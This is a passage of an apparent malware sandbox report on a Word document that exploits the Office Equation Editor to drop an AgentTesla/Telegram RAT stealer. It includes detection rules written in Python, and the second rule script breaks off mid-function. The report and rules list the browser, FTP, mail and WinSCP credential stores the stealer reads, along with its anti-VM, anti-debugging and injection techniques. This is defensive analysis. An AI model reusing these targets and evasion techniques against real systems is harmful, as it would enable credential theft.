                      Source: 4.2.gudostrp.exe.1d0000.0.unpack, PointerToRelocations.cs | Base64 encoded string: 'KknRp7HQQvHHBtyvGqKkQPgwSxrDZccPIvljRo+32rU6dcfrjjwlA+/74UKQkI50', 'n/ZGPw0Rnde/5vrFGQTkY8FPHDUw84v1zRXhcoRNVdfo4NG1a//9Q6xctd3zCMeG', '+eXUcThFekX3G8Ul+iy8PTjd4CCEEvw/RRULKiZzJHE1VD6vEOtFO57C82jzLkjj', 'gRfomnjmScAnaVNNcbO4XwmlyiUUrURhk8amHDtWGGhvEx0K1vQimNrPR2fO3ekH'
                      Source: 5.2.gudostrp.exe.1d0000.0.unpack, PointerToRelocations.cs | Base64 encoded string: 'KknRp7HQQvHHBtyvGqKkQPgwSxrDZccPIvljRo+32rU6dcfrjjwlA+/74UKQkI50', 'n/ZGPw0Rnde/5vrFGQTkY8FPHDUw84v1zRXhcoRNVdfo4NG1a//9Q6xctd3zCMeG', '+eXUcThFekX3G8Ul+iy8PTjd4CCEEvw/RRULKiZzJHE1VD6vEOtFO57C82jzLkjj', 'gRfomnjmScAnaVNNcbO4XwmlyiUUrURhk8amHDtWGGhvEx0K1vQimNrPR2fO3ekH'
                      Source: 5.0.gudostrp.exe.1d0000.0.unpack, PointerToRelocations.cs | Base64 encoded string: 'KknRp7HQQvHHBtyvGqKkQPgwSxrDZccPIvljRo+32rU6dcfrjjwlA+/74UKQkI50', 'n/ZGPw0Rnde/5vrFGQTkY8FPHDUw84v1zRXhcoRNVdfo4NG1a//9Q6xctd3zCMeG', '+eXUcThFekX3G8Ul+iy8PTjd4CCEEvw/RRULKiZzJHE1VD6vEOtFO57C82jzLkjj', 'gRfomnjmScAnaVNNcbO4XwmlyiUUrURhk8amHDtWGGhvEx0K1vQimNrPR2fO3ekH'
                      Source: 5.2.gudostrp.exe.400000.1.unpack, A/b2.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: Window Recorder | Window detected: More than 3 window changes detected
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

                      Data Obfuscation:

                      Binary or sample is protected by dotNetProtector
                      Source: gudostrp.exe | String found in binary or memory: dotNetProtector
                      Source: gudostrp.exe, 00000004.00000002.462296022.00000000001D2000.00000020.00020000.sdmp | String found in binary or memory: kIHasFieldMarshalReplaceInternalJoinInternalSet_IsLiteralAppCompatLiteralGet_IsInternalCalladvapi32.dllkernel32.dllKillEcmaPublicKeyFullSet_PercentSymbolChangeAccessControlBlobStreamInternalLoadFromStreamCryptoStreamMemoryStreamSystemSymmetricAlgorithmHashAlgorithmFormICryptoTransformGet_InGet_IsAddOnTanConvertHijriToGregorianStrLenget_MetadataTokenResolveTokenAssignCancellationTokenlpNumberOfBytesWrittenEndStrongNameSignBeginStrongNameSignSinAppDomainget_CurrentDomainGet_EndColumnGet_RevisionApplicationget_LocationOp_UnaryNegationNineRays.Obfuscator.EvaluationNoOptimizationSystem.ReflectionGetBaseDefinitionGenericParameterPositionCallingConventionRuntimeWrappedExceptionEncoderFallbackExceptionRunGetDynamicILInfoRslvMethodFieldInfoEhEndFinallyFieldInfoMethodInfo_compareInfoMemberInfoParameterInfoDelegateCtorInfoZeroGet_IsCharSetAutoAlignUpGetInterfaceMapInitializeEventMapGet_BlobHeapTablesHeapSleepSystem.Linqset_ShowInTaskbarGet_DefaultCalendarFirstGregorianTableYearMoveRightGetCharGet_CurrentCharGet_ParamNumberGet_ManagedNativeHeaderWriteTinyHeaderGetBlobReaderSyncTextReaderDESCryptoServiceProviderMethodBuilderModuleBuilderTypeBuilderAssemblyBuilderM_lastBlockBufferlpBufferResourceManagerDebuggerSet_IsOtherget_IsModifierWSTRBufferMarshalerAddOneArgTypeHelperCheckHelperCreateAttributeArrayHelperCreateProcessAsUserget_IsPointerBitConverterResolverModuleDirGetTokenForFloorSetLastErrorIEnumeratorInitializeTypeEnumeratorGetEnumerator.ctorLoadFactor.cctordotNetProtectorget_IsConstructorCreateDecryptorFromIntPtrBuildRevisionStr/
                      Source: gudostrp.exe, 00000005.00000002.721799916.00000000001D2000.00000020.00020000.sdmp | String found in binary or memory: kIHasFieldMarshalReplaceInternalJoinInternalSet_IsLiteralAppCompatLiteralGet_IsInternalCalladvapi32.dllkernel32.dllKillEcmaPublicKeyFullSet_PercentSymbolChangeAccessControlBlobStreamInternalLoadFromStreamCryptoStreamMemoryStreamSystemSymmetricAlgorithmHashAlgorithmFormICryptoTransformGet_InGet_IsAddOnTanConvertHijriToGregorianStrLenget_MetadataTokenResolveTokenAssignCancellationTokenlpNumberOfBytesWrittenEndStrongNameSignBeginStrongNameSignSinAppDomainget_CurrentDomainGet_EndColumnGet_RevisionApplicationget_LocationOp_UnaryNegationNineRays.Obfuscator.EvaluationNoOptimizationSystem.ReflectionGetBaseDefinitionGenericParameterPositionCallingConventionRuntimeWrappedExceptionEncoderFallbackExceptionRunGetDynamicILInfoRslvMethodFieldInfoEhEndFinallyFieldInfoMethodInfo_compareInfoMemberInfoParameterInfoDelegateCtorInfoZeroGet_IsCharSetAutoAlignUpGetInterfaceMapInitializeEventMapGet_BlobHeapTablesHeapSleepSystem.Linqset_ShowInTaskbarGet_DefaultCalendarFirstGregorianTableYearMoveRightGetCharGet_CurrentCharGet_ParamNumberGet_ManagedNativeHeaderWriteTinyHeaderGetBlobReaderSyncTextReaderDESCryptoServiceProviderMethodBuilderModuleBuilderTypeBuilderAssemblyBuilderM_lastBlockBufferlpBufferResourceManagerDebuggerSet_IsOtherget_IsModifierWSTRBufferMarshalerAddOneArgTypeHelperCheckHelperCreateAttributeArrayHelperCreateProcessAsUserget_IsPointerBitConverterResolverModuleDirGetTokenForFloorSetLastErrorIEnumeratorInitializeTypeEnumeratorGetEnumerator.ctorLoadFactor.cctordotNetProtectorget_IsConstructorCreateDecryptorFromIntPtrBuildRevisionStr/
                      Source: gufoxqa[1].exe.2.dr | String found in binary or memory: dotNetProtector
                      Source: gufoxqa[1].exe.2.dr | String found in binary or memory: kIHasFieldMarshalReplaceInternalJoinInternalSet_IsLiteralAppCompatLiteralGet_IsInternalCalladvapi32.dllkernel32.dllKillEcmaPublicKeyFullSet_PercentSymbolChangeAccessControlBlobStreamInternalLoadFromStreamCryptoStreamMemoryStreamSystemSymmetricAlgorithmHashAlgorithmFormICryptoTransformGet_InGet_IsAddOnTanConvertHijriToGregorianStrLenget_MetadataTokenResolveTokenAssignCancellationTokenlpNumberOfBytesWrittenEndStrongNameSignBeginStrongNameSignSinAppDomainget_CurrentDomainGet_EndColumnGet_RevisionApplicationget_LocationOp_UnaryNegationNineRays.Obfuscator.EvaluationNoOptimizationSystem.ReflectionGetBaseDefinitionGenericParameterPositionCallingConventionRuntimeWrappedExceptionEncoderFallbackExceptionRunGetDynamicILInfoRslvMethodFieldInfoEhEndFinallyFieldInfoMethodInfo_compareInfoMemberInfoParameterInfoDelegateCtorInfoZeroGet_IsCharSetAutoAlignUpGetInterfaceMapInitializeEventMapGet_BlobHeapTablesHeapSleepSystem.Linqset_ShowInTaskbarGet_DefaultCalendarFirstGregorianTableYearMoveRightGetCharGet_CurrentCharGet_ParamNumberGet_ManagedNativeHeaderWriteTinyHeaderGetBlobReaderSyncTextReaderDESCryptoServiceProviderMethodBuilderModuleBuilderTypeBuilderAssemblyBuilderM_lastBlockBufferlpBufferResourceManagerDebuggerSet_IsOtherget_IsModifierWSTRBufferMarshalerAddOneArgTypeHelperCheckHelperCreateAttributeArrayHelperCreateProcessAsUserget_IsPointerBitConverterResolverModuleDirGetTokenForFloorSetLastErrorIEnumeratorInitializeTypeEnumeratorGetEnumerator.ctorLoadFactor.cctordotNetProtectorget_IsConstructorCreateDecryptorFromIntPtrBuildRevisionStr/
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Code function: 4_2_001DEB0F push esp; iretd
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Code function: 4_2_001D67F6 pushfd ; iretd
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Code function: 4_2_0030DE0D pushfd ; iretd
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Code function: 4_2_0030DB73 push esp; iretd
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Code function: 4_2_01FA5275 push ebx; iretd
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Code function: 4_2_01FB4FE7 push ebx; ret
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Code function: 4_2_01FB504D push ebp; retf
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Code function: 4_2_01FB4FBE push ebx; ret
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Code function: 4_2_01FBA412 pushad ; retf
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Code function: 4_2_01FCB713 pushad ; iretd
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Code function: 4_2_02035645 pushad ; ret
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Code function: 4_2_041D561B push eax; retf
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Code function: 4_2_041D7CC7 push ebx; ret
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Code function: 4_2_041D5901 pushad ; ret
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Code function: 5_2_001DEB0F push esp; iretd
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Code function: 5_2_001D67F6 pushfd ; iretd
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Code function: 5_2_002530B5 push esp; retf 0012h
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Code function: 5_2_00251B15 push esp; retf 0012h
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Code function: 5_2_0055626C pushfd ; retf 0018h
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\gudostrp.exe
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gufoxqa[1].exe
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 408 | Thread sleep time: -300000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe TID: 2916 | Thread sleep time: -360000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe TID: 2364 | Thread sleep time: -3689348814741908s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe TID: 2364 | Thread sleep time: -150000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe TID: 2096 | Thread sleep count: 9569 > 30
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe TID: 2096 | Thread sleep count: 171 > 30
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe TID: 2364 | Thread sleep count: 105 > 30
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Last function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Window / User API: threadDelayed 9569
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe | WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Process information queried: ProcessInformation
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Thread delayed: delay time: 30000

                      Anti Debugging:

                      Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Code function: 4_2_041DCAE8 CheckRemoteDebuggerPresent,
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Process token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Process queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Memory written: C:\Users\user\AppData\Roaming\gudostrp.exe base: 400000 value starts with: 4D5A
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\gudostrp.exe C:\Users\user\AppData\Roaming\gudostrp.exe
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Process created: C:\Users\user\AppData\Roaming\gudostrp.exe C:\Users\user\AppData\Roaming\gudostrp.exe
                      Source: gudostrp.exe, 00000005.00000002.722211246.0000000000CD0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
                      Source: gudostrp.exe, 00000005.00000002.722211246.0000000000CD0000.00000002.00020000.sdmp | Binary or memory string: !Progman
                      Source: gudostrp.exe, 00000005.00000002.722211246.0000000000CD0000.00000002.00020000.sdmp | Binary or memory string: Program Manager<
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Queries volume information: C:\Users\user\AppData\Roaming\gudostrp.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      Yara detected Telegram RAT
                      Source: Yara match | File source: 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: gudostrp.exe PID: 2576, type: MEMORYSTR
                      Yara detected AgentTesla
                      Source: Yara match | File source: 5.2.gudostrp.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.gudostrp.exe.31ca110.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.gudostrp.exe.3200330.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.gudostrp.exe.3200330.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.gudostrp.exe.31ca110.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000005.00000002.721925198.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000002.464298353.00000000031C9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.722361543.000000000238D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.722327903.0000000002338000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: gudostrp.exe PID: 1212, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: gudostrp.exe PID: 2576, type: MEMORYSTR
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Tries to steal Mail credentials (via file access)Show sources
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: Yara matchFile source: 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: gudostrp.exe PID: 2576, type: MEMORYSTR
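The file and registry opens listed above are the signal a detection engineer would hunt for: a single process, running from the user's AppData\Roaming directory, reading the credential stores of a browser, two FTP clients, three mail clients and WinSCP within seconds. The following script is an added example, not part of the Joe Sandbox report or of AgentTesla, that turns the exact targets from this report into a small correlation rule over constructed file/registry-open events. The event shape (pid, image, target), the owner allow-list and the benign Firefox event are assumptions made for the example.

```python
import re
from collections import defaultdict

# Credential stores that gudostrp.exe opened in this report, grouped by the
# application family that owns them. Each pattern is matched case-insensitively
# against the file path or registry key recorded in an event.
CREDENTIAL_STORES = {
    "browser": [
        r"\\Google\\Chrome\\User Data\\[^\\]+\\Login Data$",
        r"\\Mozilla\\Firefox\\profiles\.ini$",
    ],
    "ftp": [
        r"\\FileZilla\\recentservers\.xml$",
        r"\\SmartFTP\\Client 2\.0\\Favorites\\",
    ],
    "mail": [
        r"\\Thunderbird\\profiles\.ini$",
        r"\\Windows Messaging Subsystem\\Profiles\\Outlook\\",
        r"\\IncrediMail\\Identities$",
    ],
    "scp": [
        r"\\Martin Prikryl\\WinSCP 2\\Sessions$",
    ],
}

# Image names allowed to read each family's store. This allow-list is an
# assumption for the example, not something the report states.
LEGITIMATE_OWNERS = {
    "browser": {"chrome.exe", "firefox.exe"},
    "ftp": {"filezilla.exe", "smartftp.exe"},
    "mail": {"thunderbird.exe", "outlook.exe", "incmail.exe"},
    "scp": {"winscp.exe"},
}


def classify(target):
    """Return the store family a path or registry key belongs to, or None."""
    for family, patterns in CREDENTIAL_STORES.items():
        if any(re.search(p, target, re.IGNORECASE) for p in patterns):
            return family
    return None


def find_credential_harvesters(events, min_families=2):
    """Group file/registry opens by (pid, image) and return the processes that
    read stores of at least `min_families` families they do not own, mapped to
    the sorted list of families touched. An application reading its own store
    is never counted, so a browser loading its own profile does not alert."""
    touched = defaultdict(set)
    for ev in events:
        family = classify(ev["target"])
        if family is None:
            continue
        image = ev["image"].rsplit("\\", 1)[-1].lower()
        if image in LEGITIMATE_OWNERS[family]:
            continue
        touched[(ev["pid"], ev["image"])].add(family)
    return {key: sorted(fams) for key, fams in touched.items()
            if len(fams) >= min_families}


# Constructed events modelled on the report's "File opened" / "Key opened"
# entries for PID 2576, plus one unrelated DLL read and one benign Firefox read
# for contrast. The event schema is an assumption, not a real Sysmon layout.
STEALER = r"C:\Users\user\AppData\Roaming\gudostrp.exe"
SAMPLE_EVENTS = [
    {"pid": 2576, "image": STEALER, "target": r"HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"},
    {"pid": 2576, "image": STEALER, "target": "C:\\Users\\user\\AppData\\Roaming\\SmartFTP\\Client 2.0\\Favorites\\Quick Connect\\"},
    {"pid": 2576, "image": STEALER, "target": r"C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml"},
    {"pid": 2576, "image": STEALER, "target": r"C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini"},
    {"pid": 2576, "image": STEALER, "target": r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"},
    {"pid": 2576, "image": STEALER, "target": r"HKEY_CURRENT_USER\Software\IncrediMail\Identities"},
    {"pid": 2576, "image": STEALER, "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"pid": 2576, "image": STEALER, "target": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"},
    {"pid": 2576, "image": STEALER, "target": r"C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll"},
    {"pid": 3104, "image": r"C:\Program Files (x86)\Mozilla Firefox\firefox.exe", "target": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"},
]

if __name__ == "__main__":
    for (pid, image), families in find_credential_harvesters(SAMPLE_EVENTS).items():
        print("PID %d %s read credential stores for: %s" % (pid, image, ", ".join(families)))
```

The threshold of two families is what separates a stealer from a legitimate migration or backup tool that reads one application's data; raise it if a fleet has such tools, and add the process's own image path (here, a user-writable directory) as a second signal before alerting.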

Remote Access Functionality:

Yara detected Telegram RAT
Source: Yara match | File source: 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: gudostrp.exe PID: 2576, type: MEMORYSTR
Yara detected AgentTesla
Source: Yara match | File source: 5.2.gudostrp.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.gudostrp.exe.31ca110.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.gudostrp.exe.3200330.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.gudostrp.exe.3200330.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.gudostrp.exe.31ca110.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.721925198.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.464298353.00000000031C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.722361543.000000000238D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.722327903.0000000002338000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: gudostrp.exe PID: 1212, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: gudostrp.exe PID: 2576, type: MEMORYSTR

Mitre Att&ck Matrix

Matched techniques per tactic (the digits in brackets are the signature-count superscripts shown in the original matrix; tactics with no matched technique are listed at the end):

• Initial Access: Valid Accounts [1]
• Execution: Windows Management Instrumentation [211]; Exploitation for Client Execution [13]
• Persistence: Valid Accounts [1]
• Privilege Escalation: Valid Accounts [1]; Access Token Manipulation [1]; Process Injection [112]
• Defense Evasion: Disable or Modify Tools [1]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [11]; Masquerading [1]; Valid Accounts [1]; Modify Registry [1]; Access Token Manipulation [1]; Virtualization/Sandbox Evasion [141]; Process Injection [112]
• Credential Access: OS Credential Dumping [2]; Credentials in Registry [1]
• Discovery: File and Directory Discovery [1]; System Information Discovery [114]; Security Software Discovery [22]; Process Discovery [2]; Virtualization/Sandbox Evasion [141]; Application Window Discovery [1]; Remote System Discovery [1]
• Collection: Archive Collected Data [11]; Data from Local System [2]; Email Collection [1]
• Command and Control: Web Service [1]; Ingress Tool Transfer [12]; Encrypted Channel [11]; Non-Application Layer Protocol [3]; Application Layer Protocol [24]

No technique was matched under Lateral Movement, Exfiltration, Network Effects, Remote Service Effects or Impact.

Behavior Graph

Legend:

• Process
• Signature
• Created File
• DNS/IP Info
• Is Dropped
• Is Windows Process
• Number of created Registry Values
• Number of created Files
• Visual Basic
• Delphi
• Java
• .Net C# or VB.NET
• C, C++ or other language
• Is malicious
• Internet

Behavior Graph ID: 502700 | Sample: Purchase Order_0131021.doc | Start date: 14/10/2021 | Architecture: WINDOWS | Score: 100

Sample-level signatures: Found malware configuration; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 11 other signatures

Process tree and edges (the numbers in parentheses after a process name are the created-file / registry-value badges as shown in the graph):

• WINWORD.EXE (291 25), started from the sample
• EQNEDT32.EXE (11), started from the sample
  - DNS/IP: palangavra.lt, 144.76.47.167, port 80 (local port 49167), HETZNER-ASDE, Germany
  - Dropped: C:\Users\user\AppData\Roaming\gudostrp.exe, PE32
  - Dropped: C:\Users\user\AppData\...\gufoxqa[1].exe, PE32
  - Signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
  - Starts: gudostrp.exe (2)
• gudostrp.exe (2), started by EQNEDT32.EXE
  - Signature: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
  - Signature: Machine Learning detection for dropped file
  - Signature: Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
  - 2 other signatures
  - Starts: gudostrp.exe (12 2)
• gudostrp.exe (12 2), started by gudostrp.exe
  - DNS/IP: api.telegram.org, 149.154.167.220, port 443 (local port 49169), TELEGRAMRU, United Kingdom
  - Signature: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
  - Signature: Tries to steal Mail credentials (via file access)
  - Signature: Tries to harvest and steal ftp login credentials
  - Signature: Tries to harvest and steal browser information (history, passwords, etc)
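The graph is the whole kill chain in four edges: the Equation Editor (EQNEDT32.EXE) reaches out to palangavra.lt, writes a PE into AppData\Roaming, starts it, the dropper starts a second copy of itself (the injection step), and that copy talks to api.telegram.org. Each edge is individually detectable from process, file and network telemetry. The script below is an added example, not code from the report or from Joe Sandbox, that encodes those edges as rules over constructed Sysmon-style events and rebuilds the ancestry of the process that contacted Telegram. PIDs 1212 and 2576, the hosts, IPs and ports come from the report; the other PIDs, the Office and Equation Editor install paths, the svchost.exe (DCOM) parent of EQNEDT32.EXE, the Chrome event and the Telegram allow-list are assumptions.

```python
import re

EQUATION_EDITOR = "eqnedt32.exe"
# Anything under a user profile counts as a user-writable drop location.
USER_PROFILE = re.compile(r"^[A-Z]:\\Users\\[^\\]+\\", re.IGNORECASE)
# Processes expected to reach api.telegram.org. Assumption for the example:
# only browsers; tune this to the environment.
TELEGRAM_API_ALLOWED = {"chrome.exe", "firefox.exe", "iexplore.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1]


def detect(events):
    """Run the chain rules over Sysmon-style events and return alerts as
    (rule, pid, detail) tuples in event order."""
    alerts = []
    for ev in events:
        image = basename(ev["image"]).lower()
        if ev["type"] == "process":
            parent = basename(ev["parent_image"]).lower()
            if parent == EQUATION_EDITOR:
                alerts.append(("equation_editor_spawn", ev["pid"], ev["image"]))
            # A binary in a user profile launching a copy of itself is the
            # dropper -> injected-copy edge seen for gudostrp.exe.
            if parent == image and USER_PROFILE.match(ev["image"]):
                alerts.append(("self_spawn_from_user_profile", ev["pid"], ev["image"]))
        elif ev["type"] == "file":
            if image == EQUATION_EDITOR and ev["target"].lower().endswith(".exe"):
                alerts.append(("equation_editor_drop", ev["pid"], ev["target"]))
        elif ev["type"] == "network":
            dest = "%s:%d" % (ev["dest_host"], ev["dest_port"])
            if image == EQUATION_EDITOR:
                alerts.append(("equation_editor_network", ev["pid"], dest))
            if ev["dest_host"] == "api.telegram.org" and image not in TELEGRAM_API_ALLOWED:
                alerts.append(("telegram_api_unexpected_process", ev["pid"], dest))
    return alerts


def ancestry(events, pid):
    """Follow parent links from `pid` upward and return image basenames from
    the process itself to the oldest parent named in the events."""
    by_pid = {ev["pid"]: ev for ev in events if ev["type"] == "process"}
    chain, last_parent = [], None
    while pid in by_pid:
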